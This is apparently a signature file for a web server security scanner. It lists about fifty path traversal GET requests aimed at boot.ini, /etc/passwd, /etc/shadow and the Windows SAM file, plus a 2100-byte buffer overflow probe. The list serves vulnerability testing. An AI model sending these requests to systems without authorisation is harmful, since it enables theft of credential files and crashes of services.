##################################################################### #Common Webserver(HTTP support programs) Security check rule # # # #rule by pilot # # # ##################################################################### 200 OK-> GET :/../../../../../../../../boot.ini^webserver security test1;; 200 OK-> GET :/../../../../../../../boot.ini^webserver security test2;; 200 OK-> GET :/../../../../../../boot.ini^webserver security test3;; 200 OK-> GET :/../../../../../boot.ini^webserver security test4;; 200 OK-> GET :/../../../../boot.ini^webserver security test5;; 200 OK-> GET :/../../../boot.ini^webserver security test6;; 200 OK-> GET :/../../boot.ini^webserver security test7;; 200 OK-> GET :/\../boot.ini^webserver security test8;; 200 OK-> GET :/\../config.sys^webserver security test9;; 200 OK-> GET :/nofile.pl^webserver security test10;; 200 OK-> GET :/...................../config.sys ^webserver security test11;; 200 OK-> GET :/..................../boot.ini ^webserver security test12;; 200 OK-> GET :/.................../boot.ini ^webserver security test13;; 200 OK-> GET :/................../boot.ini ^webserver security test14;; 200 OK-> GET :/................./boot.ini ^webserver security test15;; 200 OK-> GET :/................/boot.ini ^webserver security test16;; 200 OK-> GET :/.............../boot.ini ^webserver security test17;; 200 OK-> GET :/............../boot.ini ^webserver security test18;; 200 OK-> GET :/............./boot.ini ^webserver security test19;; 200 OK-> GET :/............/boot.ini ^webserver security test20;; 200 OK-> GET :/.........../boot.ini ^webserver security test21;; 200 OK-> GET :/........../boot.ini ^webserver security test22;; 200 OK-> GET :/........./boot.ini ^webserver security test23;; 200 OK-> GET :/......../boot.ini ^webserver security test24;; 200 OK-> GET :/......./boot.ini ^webserver security test25;; 200 OK-> GET :/....../boot.ini ^webserver security test26;; 200 OK-> GET :/...../boot.ini ^webserver security test27;; 200 OK-> GET :/..../boot.ini ^webserver security test28;; 200 OK-> GET :/.../boot.ini ^webserver security test29;; 200 OK-> GET :/../boot.ini ^webserver security test30;; 200 OK-> GET :/cgi/^webserver security test31;; 200 OK-> GET :/cgi-bin/^webserver security test32;; 200 OK-> GET :/../../shadow^webserver security test33;; 200 OK-> GET :/../../passwd^webserver security test34;; 200 OK-> GET :/../../../etc/passwd^webserver security test35;; 200 OK-> GET :/../../../../etc/passwd^webserver security test36;; 200 OK-> GET :/../../../../../etc/passwd^webserver security test37;; 200 OK-> GET :/../../etc/passwd^webserver security test38;; 200 OK-> GET :/..\..\..\winnt\repair\sam._^webserver security test39;; 200 OK-> GET :/../../winnt/win.ini^webserver security test40;; 200 OK-> GET :/../../../../../winnt/repair/sam._^webserver security test41;; 200 OK-> GET :/..\..\autoexec.bat^webserver security test42;; 200 OK-> GET :/..\..\..\autoexec.bat^webserver security test43;; 200 OK-> GET :/..\..\..\..\autoexec.bat^webserver security test44;; 200 OK-> GET :/..\..\..\..\..\autoexec.bat^webserver security test45;; 200 OK-> GET :/..\..\..\..\..\..\autoexec.bat^webserver security test46;; 200 OK-> GET :/\../readme.txt^webserver security test47;; 200 OK-> GET :/\../boot.ini^webserver security test48;; 500-> GET :/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa^2100 byte bof test;; ######################################################################################################################